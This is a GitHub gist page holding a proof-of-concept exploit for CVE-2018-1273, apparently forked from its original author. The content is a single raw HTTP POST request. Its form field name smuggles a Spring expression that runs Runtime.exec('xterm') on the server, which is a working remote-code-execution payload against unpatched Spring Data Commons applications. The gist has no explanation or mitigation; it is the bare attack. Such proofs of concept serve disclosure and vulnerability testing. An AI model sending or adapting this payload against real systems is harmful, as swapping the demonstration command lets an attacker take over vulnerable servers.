Skip to content

Instantly share code, notes, and snippets.

View msakamoto-sf's full-sized avatar

Masahiko Sakamoto msakamoto-sf

View GitHub Profile
@msakamoto-sf
msakamoto-sf / CVE-2018-1273.http
Created April 17, 2018 03:43 — forked from matthiaskaiser/CVE-2018-1273.http
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf